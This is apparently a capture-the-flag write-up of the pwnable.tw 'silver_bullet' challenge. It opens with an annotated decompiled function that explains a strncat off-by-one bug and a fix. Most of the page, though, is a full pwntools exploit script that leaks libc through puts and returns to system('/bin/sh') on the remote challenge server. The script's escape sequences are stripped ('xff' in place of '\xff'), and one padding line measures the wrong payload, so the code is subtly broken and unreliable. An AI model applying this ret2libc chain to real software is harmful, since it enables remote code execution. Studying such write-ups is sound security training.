  • pwnable.tw silver_bullet

    产生漏洞的原因

    /*
     * Decompiler listing of silver_bullet's power_up (the `__cdecl`, `_DWORD`
     * and `[esp+..]` annotations are decompiler output, not hand-written C).
     *
     * dest is the bullet record: a character buffer followed, at dest + 0x30
     * (read below as *((_DWORD *)dest + 12)), by a length counter.  `s` is
     * really a 0x30-byte stack buffer, as the memset on it shows.
     *
     * Root cause: the guard `> 47u` and the bound `48 - len` keep the copied
     * characters inside the 48-byte buffer, but strncat also writes a '\0'
     * after the last character.  When the concatenation fills all 48 bytes,
     * that terminator lands on dest + 0x30, i.e. on the length counter, so the
     * counter is reset and the length stored afterwards is smaller than the
     * real string length.  A later call then trusts the understated length
     * and accepts more input than the buffer can hold.
     *
     * Mitigation: budget for the terminator (cap the total at 47 characters,
     * or pass `47 - len` as the remaining space), or copy with memcpy against
     * an explicitly checked remaining capacity instead of strncat, and keep
     * the length counter out of reach of string writes.
     *
     * Returns the value of the last puts() call.
     */
    int __cdecl power_up(char *dest)
    {
      char s; // [esp+0h] [ebp-34h]  -- first byte of a 0x30-byte stack buffer (see memset below)
      size_t new_len; // [esp+30h] [ebp-4h]
    
      new_len = 0;
      memset(&s, 0, 0x30u);
      if ( !*dest )
        return puts("You need create the bullet first !");
      if ( *((_DWORD *)dest + 12) > 47u )           // len > 47: no further power-up allowed
        return puts("You can't power up any more !");
      printf("Give me your another description of bullet :");
      read_input(&s, 48 - *((_DWORD *)dest + 12));
      strncat(dest, &s, 48 - *((_DWORD *)dest + 12));// strncat appends a terminating '\0' to dest; the field holding the
                                                    // string length sits right at dest + 0x30, so once the concatenated
                                                    // string reaches 0x30 bytes that terminator overwrites the length with 0
      new_len = strlen(&s) + *((_DWORD *)dest + 12);// with the stored length zeroed, new_len is only the appended string's length
      printf("Your new power is : %u
    ", new_len);
      *((_DWORD *)dest + 12) = new_len;             // understated length is written back and trusted by the next call
      return puts("Enjoy it !");
    }

    脚本

    from pwn import *

    context.log_level='DEBUG'


    r=remote('chall.pwnable.tw',10103)
    file=ELF('./silver_bullet')
    libc=ELF('./libc_32.so.6')
    '''
    r=process('./silver_bullet')
    file=ELF('./silver_bullet')
    libc=ELF('/lib/i386-linux-gnu/libc-2.28.so')
    '''

    #trigger stack overflow
    r.recvuntil('Your choice :')
    r.sendline('1')
    r.recvuntil('Give me your description of bullet :')
    r.send('a'*47)
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    r.send('b')
    #gdb.attach(r)

    #leak libc
    r.recvuntil('Your choice :')
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    start=0x080484F0
    payload='xff'*3+p32(0xdeadbeaf)+p32(file.plt['puts'])+p32(start)+p32(file.got['puts'])
    payload+=(47-len(payload))*'a'
    r.send(payload)
    r.recvuntil('Your choice :')
    r.sendline('3')
    r.recvuntil('Oh ! You win !! ')
    libc_base=u32(r.recv(4))-libc.sym['puts']
    success('libc_base:'+hex(libc_base))
    sys_addr=libc_base+libc.sym['system']
    binsh_addr=libc_base+libc.search('/bin/sh').next()
    success('binsh_addr'+hex(binsh_addr))
    #gdb.attach(r)

    #trigger stack overflow again
    r.recvuntil('Your choice :')
    r.sendline('1')
    r.recvuntil('Give me your description of bullet :')
    r.send('a'*47)
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    r.send('b')

    #trigger system('/bin/sh') call
    r.recvuntil('Your choice :')
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    payload1='xff'*3+p32(0xdeadbeaf)+p32(sys_addr)+p32(0xdeadbeaf)+p32(binsh_addr)
    payload1+=(47-len(payload))*'a'
    r.send(payload1)
    r.recvuntil('Your choice :')
    r.sendline('3')
    r.recvuntil('Oh ! You win !! ')
    r.interactive()



  • 原文地址:https://www.cnblogs.com/snip3r/p/10628682.html